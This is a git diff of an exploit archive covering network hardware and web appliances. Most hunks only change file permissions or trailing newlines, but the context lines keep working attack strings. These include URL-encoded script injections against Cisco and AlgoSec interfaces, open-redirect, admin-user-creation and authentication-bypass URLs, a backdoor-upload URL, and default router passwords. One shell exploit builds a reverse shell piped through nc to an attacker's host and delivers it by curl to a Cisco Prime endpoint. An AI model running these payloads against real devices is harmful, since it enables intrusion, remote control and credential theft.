-http://www.example.com/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 \ No newline at end of file +http://www.example.com/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 \ No newline at end of file diff --git a/platforms/hardware/remote/38536.txt b/platforms/hardware/remote/38536.txt old mode 100755 new mode 100644 index caec5daca..0fb6f6df6 --- a/platforms/hardware/remote/38536.txt +++ b/platforms/hardware/remote/38536.txt @@ -8,4 +8,4 @@ Barracuda SSL VPN 680 2.2.2.203 is vulnerable; other versions may also be affect https://www.example.com/launchApplication.do?resourceId=1&policy=1&returnTo=%2FshowApplicationShortcuts.do https://www.exmaple.com/launchApplication.do?resourceId=1&policy=1&returnTo=http://www.example.com -https://www.exmaple.com/[FILE].do?[RES+ID]=x&[POLICY]=x&returnTo=[EXTERNAL TARGET] \ No newline at end of file +https://www.exmaple.com/[FILE].do?[RES+ID]=x&[POLICY]=x&returnTo=[EXTERNAL TARGET] \ No newline at end of file diff --git a/platforms/hardware/remote/38582.html b/platforms/hardware/remote/38582.html old mode 100755 new mode 100644 index 8cd6022e9..dc50ff532 --- a/platforms/hardware/remote/38582.html +++ b/platforms/hardware/remote/38582.html @@ -17,4 +17,4 @@ Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerab <script>document.gobap.submit();</script> </form> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/hardware/remote/38583.html b/platforms/hardware/remote/38583.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38584.txt b/platforms/hardware/remote/38584.txt old mode 100755 new mode 100644 index 346f8b055..d2c4af3ac --- a/platforms/hardware/remote/38584.txt +++ b/platforms/hardware/remote/38584.txt @@ -4,4 +4,4 @@ Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/L Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. -http://www.example.com/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0 \ No newline at end of file +http://www.example.com/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0 \ No newline at end of file diff --git a/platforms/hardware/remote/38632.txt b/platforms/hardware/remote/38632.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38663.txt b/platforms/hardware/remote/38663.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38671.txt b/platforms/hardware/remote/38671.txt old mode 100755 new mode 100644 index 19b97287b..4c498526c --- a/platforms/hardware/remote/38671.txt +++ b/platforms/hardware/remote/38671.txt @@ -10,4 +10,4 @@ http://www.example.com/gui/route/route?%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C http://www.example.com/gui/route/route?_=1354073910062&bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C# -http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C# \ No newline at end of file +http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C# \ No newline at end of file diff --git a/platforms/hardware/remote/38692.txt b/platforms/hardware/remote/38692.txt old mode 100755 new mode 100644 index 66c52172f..d0b5fb13f --- a/platforms/hardware/remote/38692.txt +++ b/platforms/hardware/remote/38692.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow AlgoSec Firewall Analyzer 6.1-b86 is affected; other versions may also be vulnerable. -http//www.example.com/afa/php/Login.php/>'><ScRiPt>alert(11111111)</ScRiPt> HTTP/1.1 \ No newline at end of file +http//www.example.com/afa/php/Login.php/>'><ScRiPt>alert(11111111)</ScRiPt> HTTP/1.1 \ No newline at end of file diff --git a/platforms/hardware/remote/38715.txt b/platforms/hardware/remote/38715.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38716.txt b/platforms/hardware/remote/38716.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38717.txt b/platforms/hardware/remote/38717.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38718.txt b/platforms/hardware/remote/38718.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38719.txt b/platforms/hardware/remote/38719.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38720.txt b/platforms/hardware/remote/38720.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38721.txt b/platforms/hardware/remote/38721.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38722.txt b/platforms/hardware/remote/38722.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38723.txt b/platforms/hardware/remote/38723.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38724.txt b/platforms/hardware/remote/38724.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38725.txt b/platforms/hardware/remote/38725.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38726.txt b/platforms/hardware/remote/38726.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38824.html b/platforms/hardware/remote/38824.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/38850.txt b/platforms/hardware/remote/38850.txt old mode 100755 new mode 100644 index ced8bc6ba..306ea0f0a --- a/platforms/hardware/remote/38850.txt +++ b/platforms/hardware/remote/38850.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow an attacker to upload and execute a Thomson Reuters Velocity Analytics 6.94 build 2995 is vulnerable; other versions may also be affected. -http://www.example.com/VhttpdMgr?action=importFile&fileName={BACKDOOR} \ No newline at end of file +http://www.example.com/VhttpdMgr?action=importFile&fileName={BACKDOOR} \ No newline at end of file diff --git a/platforms/hardware/remote/38851.html b/platforms/hardware/remote/38851.html old mode 100755 new mode 100644 index 8fad9af20..9867b6231 --- a/platforms/hardware/remote/38851.html +++ b/platforms/hardware/remote/38851.html @@ -14,4 +14,4 @@ Attackers can exploit this issue to perform certain administrative actions and g <input type="submit" value="Submit form" /> </form> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/hardware/remote/39089.txt b/platforms/hardware/remote/39089.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/39138.html b/platforms/hardware/remote/39138.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/39154.txt b/platforms/hardware/remote/39154.txt old mode 100755 new mode 100644 index ba96bf036..2748b9dc8 --- a/platforms/hardware/remote/39154.txt +++ b/platforms/hardware/remote/39154.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to execute arbitrary script code i Comtrend CT-5361T firmware version A111-312SSG-T02_R01 is vulnerable; other versions may also be affected. -http://www.example.com/password.cgi?sysPassword=[Your Password] \ No newline at end of file +http://www.example.com/password.cgi?sysPassword=[Your Password] \ No newline at end of file diff --git a/platforms/hardware/remote/39194.txt b/platforms/hardware/remote/39194.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/39195.c b/platforms/hardware/remote/39195.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/39209.txt b/platforms/hardware/remote/39209.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/39227.txt b/platforms/hardware/remote/39227.txt old mode 100755 new mode 100644 index 93448805e..68a9ddc8c --- a/platforms/hardware/remote/39227.txt +++ b/platforms/hardware/remote/39227.txt @@ -19,4 +19,4 @@ This will create a user named Haxx0r with an id of 1337 and a pin of 12345. Daniel Lawson Digital Panther Security -https://digital-panther.com \ No newline at end of file +https://digital-panther.com \ No newline at end of file diff --git a/platforms/hardware/remote/39278.txt b/platforms/hardware/remote/39278.txt old mode 100755 new mode 100644 index a99bd8d6c..6852b0ee8 --- a/platforms/hardware/remote/39278.txt +++ b/platforms/hardware/remote/39278.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to bypass the authentication mechanism and ga Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected. -http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest \ No newline at end of file +http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest \ No newline at end of file diff --git a/platforms/hardware/remote/39314.c b/platforms/hardware/remote/39314.c old mode 100755 new mode 100644 index 38b887ee0..904486692 --- a/platforms/hardware/remote/39314.c +++ b/platforms/hardware/remote/39314.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/69808/info Aztech Modem Routers are prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. +*/ HOST=$1 PORT=$2 diff --git a/platforms/hardware/remote/39522.txt b/platforms/hardware/remote/39522.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/39823.py b/platforms/hardware/remote/39823.py index ee3b88ed1..205c5dfad 100755 --- a/platforms/hardware/remote/39823.py +++ b/platforms/hardware/remote/39823.py @@ -473,6 +473,4 @@ if __name__ == "__main__": sess1.send(packet) # Hopefully we'll get something interesting - exploit.interact() - - \ No newline at end of file + exploit.interact() \ No newline at end of file diff --git a/platforms/hardware/remote/40200.txt b/platforms/hardware/remote/40200.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/40258.txt b/platforms/hardware/remote/40258.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/40275.txt b/platforms/hardware/remote/40275.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/40431.txt b/platforms/hardware/remote/40431.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/40474.txt b/platforms/hardware/remote/40474.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/40589.html b/platforms/hardware/remote/40589.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/40643.txt b/platforms/hardware/remote/40643.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/40735.txt b/platforms/hardware/remote/40735.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/40736.txt b/platforms/hardware/remote/40736.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/40813.txt b/platforms/hardware/remote/40813.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/40867.txt b/platforms/hardware/remote/40867.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/41298.txt b/platforms/hardware/remote/41298.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/41480.txt b/platforms/hardware/remote/41480.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/41718.txt b/platforms/hardware/remote/41718.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/41805.txt b/platforms/hardware/remote/41805.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/41808.txt b/platforms/hardware/remote/41808.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/42079.txt b/platforms/hardware/remote/42079.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/42331.txt b/platforms/hardware/remote/42331.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/42355.c b/platforms/hardware/remote/42355.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/425.c b/platforms/hardware/remote/425.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/42726.py b/platforms/hardware/remote/42726.py index 9a60a9423..ae8a347da 100755 --- a/platforms/hardware/remote/42726.py +++ b/platforms/hardware/remote/42726.py @@ -124,4 +124,4 @@ while True: else: conn.send(cmd + "\n") receive(conn) -sock.close() +sock.close() \ No newline at end of file diff --git a/platforms/hardware/remote/42787.txt b/platforms/hardware/remote/42787.txt old mode 100755 new mode 100644 index 89ce1e191..f4009ad22 --- a/platforms/hardware/remote/42787.txt +++ b/platforms/hardware/remote/42787.txt @@ -51,4 +51,4 @@ root:indigo root:video default:video default:[blank] -ftp:video +ftp:video \ No newline at end of file diff --git a/platforms/hardware/remote/42888.sh b/platforms/hardware/remote/42888.sh index 87d365ef2..e51f2e129 100755 --- a/platforms/hardware/remote/42888.sh +++ b/platforms/hardware/remote/42888.sh @@ -25,4 +25,4 @@ BASH=$(encode "/bin/bash") COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f") SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});" -curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT" +curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT" \ No newline at end of file diff --git a/platforms/hardware/remote/43061.txt b/platforms/hardware/remote/43061.txt old mode 100755 new mode 100644 index 669da011f..72d56d415 --- a/platforms/hardware/remote/43061.txt +++ b/platforms/hardware/remote/43061.txt @@ -24,4 +24,4 @@ In some of the MitraStar routers there is a zyad1234 user with password zyad1234 Solution -------- In the latest firmware versions this have been fixed. -If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before. +If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before. \ No newline at end of file diff --git a/platforms/hardware/remote/43105.txt b/platforms/hardware/remote/43105.txt old mode 100755 new mode 100644 index bb96c9f2d..a55143639 --- a/platforms/hardware/remote/43105.txt +++ b/platforms/hardware/remote/43105.txt @@ -36,6 +36,4 @@ root # uname -a Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown # cat /etc/zyfwinfo -Vendor Name: ZyXEL Communications Corp. - - +Vendor Name: ZyXEL Communications Corp. \ No newline at end of file diff --git a/platforms/hardware/remote/43118.txt b/platforms/hardware/remote/43118.txt old mode 100755 new mode 100644 index ccd62d1bd..7d268c9e1 --- a/platforms/hardware/remote/43118.txt +++ b/platforms/hardware/remote/43118.txt @@ -29,4 +29,4 @@ Password: CenturyL1nk # cat /proc/version Linux version 2.6.30 (waye@hugh-PowerEdge-R220.home) (gcc version 4.4.2 (Buildroot 2010.02-git) ) #1 SMP PREEMPT Fri Oct 30 12:32:15 CST 2015 # cat /etc/group - root::0:root,admin,support,user + root::0:root,admin,support,user \ No newline at end of file diff --git a/platforms/hardware/remote/43142.c b/platforms/hardware/remote/43142.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/4522.html b/platforms/hardware/remote/4522.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/4744.txt b/platforms/hardware/remote/4744.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/4941.txt b/platforms/hardware/remote/4941.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/5113.txt b/platforms/hardware/remote/5113.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/5150.txt b/platforms/hardware/remote/5150.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/5289.txt b/platforms/hardware/remote/5289.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/5313.txt b/platforms/hardware/remote/5313.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/5926.txt b/platforms/hardware/remote/5926.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/6155.c b/platforms/hardware/remote/6155.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/6305.htm b/platforms/hardware/remote/6305.htm old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/6366.c b/platforms/hardware/remote/6366.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/6476.html b/platforms/hardware/remote/6476.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/6477.html b/platforms/hardware/remote/6477.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/6750.txt b/platforms/hardware/remote/6750.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/6899.txt b/platforms/hardware/remote/6899.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/7055.txt b/platforms/hardware/remote/7055.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/7389.htm b/platforms/hardware/remote/7389.htm old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/7496.txt b/platforms/hardware/remote/7496.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/77.c b/platforms/hardware/remote/77.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/7712.txt b/platforms/hardware/remote/7712.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/7845.txt b/platforms/hardware/remote/7845.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/7858.php b/platforms/hardware/remote/7858.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/7915.txt b/platforms/hardware/remote/7915.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/7920.txt b/platforms/hardware/remote/7920.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/7921.txt b/platforms/hardware/remote/7921.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/8022.txt b/platforms/hardware/remote/8022.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/8023.txt b/platforms/hardware/remote/8023.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/8096.txt b/platforms/hardware/remote/8096.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/8269.txt b/platforms/hardware/remote/8269.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/829.c b/platforms/hardware/remote/829.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/8316.txt b/platforms/hardware/remote/8316.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/8696.txt b/platforms/hardware/remote/8696.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/8846.txt b/platforms/hardware/remote/8846.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/8963.txt b/platforms/hardware/remote/8963.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9066.txt b/platforms/hardware/remote/9066.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9117.txt b/platforms/hardware/remote/9117.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9209.txt b/platforms/hardware/remote/9209.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9422.txt b/platforms/hardware/remote/9422.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9432.txt b/platforms/hardware/remote/9432.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9456.txt b/platforms/hardware/remote/9456.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9473.txt b/platforms/hardware/remote/9473.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9498.txt b/platforms/hardware/remote/9498.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9503.txt b/platforms/hardware/remote/9503.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9658.txt b/platforms/hardware/remote/9658.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9858.txt b/platforms/hardware/remote/9858.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/9862.txt b/platforms/hardware/remote/9862.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/shellcode/13291.txt b/platforms/hardware/shellcode/13291.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/shellcode/13292.txt b/platforms/hardware/shellcode/13292.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/shellcode/13293.txt b/platforms/hardware/shellcode/13293.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/shellcode/27132.txt b/platforms/hardware/shellcode/27132.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/shellcode/40387.nasm b/platforms/hardware/shellcode/40387.nasm old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/10247.txt b/platforms/hardware/webapps/10247.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/10276.txt b/platforms/hardware/webapps/10276.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/10347.txt b/platforms/hardware/webapps/10347.txt old mode 100755 new mode 100644 index d50542248..2b87348d4 --- a/platforms/hardware/webapps/10347.txt +++ b/platforms/hardware/webapps/10347.txt @@ -27,7 +27,7 @@ Introduction ============ Barracuda Networks - Worldwide leader in email and Web security. T -he Barracuda Web Application Firewall is a complete and powerful security solution for Web applications and Web sites. +The Barracuda Web Application Firewall is a complete and powerful security solution for Web applications and Web sites. The Barracuda Web Application Firewall provides award-winning protection against hackers leveraging protocol or application vulnerabilities to instigate data theft, denial of service or defacement of your Web site. The Barracuda Web Application Firewall protects Web applications and Web services from malicious attacks, and can also increase the performance and scalability of @@ -107,4 +107,4 @@ GESEC Vulnerability-Research Team protects software, services, applications & in / \ ___| | / _ \| __ \\__ \ | | ______ | __)_\ \/ / _ \| | | | \ __\ |/ _ \ / \ (c) \ \_\ \ |_( <_> ) \_\ \/ __ \| |__ /_____/ | \\ ( <_> ) |_| | /| | | ( <_> ) | \ \______ /____/\____/|___ (____ /____/ /_______ / \_/ \____/|____/____/ |__| |__|\____/|___| / - \/ \/ \/ \/ \/ \ No newline at end of file + \/ \/ \/ \/ \/ \ No newline at end of file diff --git a/platforms/hardware/webapps/10792.txt b/platforms/hardware/webapps/10792.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/11030.txt b/platforms/hardware/webapps/11030.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/11101.txt b/platforms/hardware/webapps/11101.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/11677.txt b/platforms/hardware/webapps/11677.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/12036.txt b/platforms/hardware/webapps/12036.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/12092.txt b/platforms/hardware/webapps/12092.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/12660.txt b/platforms/hardware/webapps/12660.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/14146.txt b/platforms/hardware/webapps/14146.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/14264.html b/platforms/hardware/webapps/14264.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/14521.txt b/platforms/hardware/webapps/14521.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/15506.txt b/platforms/hardware/webapps/15506.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/15507.txt b/platforms/hardware/webapps/15507.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/15666.txt b/platforms/hardware/webapps/15666.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/15675.txt b/platforms/hardware/webapps/15675.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/15728.txt b/platforms/hardware/webapps/15728.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/15753.html b/platforms/hardware/webapps/15753.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/15810.txt b/platforms/hardware/webapps/15810.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/16252.html b/platforms/hardware/webapps/16252.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/17112.txt b/platforms/hardware/webapps/17112.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/17113.txt b/platforms/hardware/webapps/17113.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/17114.txt b/platforms/hardware/webapps/17114.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/17115.txt b/platforms/hardware/webapps/17115.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/17116.txt b/platforms/hardware/webapps/17116.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/17117.txt b/platforms/hardware/webapps/17117.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/17215.txt b/platforms/hardware/webapps/17215.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/17349.txt b/platforms/hardware/webapps/17349.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/17376.txt b/platforms/hardware/webapps/17376.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/17377.txt b/platforms/hardware/webapps/17377.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/17871.txt b/platforms/hardware/webapps/17871.txt old mode 100755 new mode 100644 index 554d60a75..759b44e66 --- a/platforms/hardware/webapps/17871.txt +++ b/platforms/hardware/webapps/17871.txt @@ -128,4 +128,4 @@ The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf Other Sense of Security advisories can be found at: -http://www.senseofsecurity.com.au/research/it-security-advisories.php \ No newline at end of file +http://www.senseofsecurity.com.au/research/it-security-advisories.php \ No newline at end of file diff --git a/platforms/hardware/webapps/17874.txt b/platforms/hardware/webapps/17874.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18061.txt b/platforms/hardware/webapps/18061.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18122.txt b/platforms/hardware/webapps/18122.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18499.txt b/platforms/hardware/webapps/18499.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18503.txt b/platforms/hardware/webapps/18503.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18504.txt b/platforms/hardware/webapps/18504.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18509.html b/platforms/hardware/webapps/18509.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18511.txt b/platforms/hardware/webapps/18511.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18517.txt b/platforms/hardware/webapps/18517.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18540.txt b/platforms/hardware/webapps/18540.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18597.txt b/platforms/hardware/webapps/18597.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18638.txt b/platforms/hardware/webapps/18638.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18646.txt b/platforms/hardware/webapps/18646.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/18859.txt b/platforms/hardware/webapps/18859.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/19185.txt b/platforms/hardware/webapps/19185.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/19263.txt b/platforms/hardware/webapps/19263.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/19774.txt b/platforms/hardware/webapps/19774.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/19859.txt b/platforms/hardware/webapps/19859.txt old mode 100755 new mode 100644 index 96d444eb4..337e0385f --- a/platforms/hardware/webapps/19859.txt 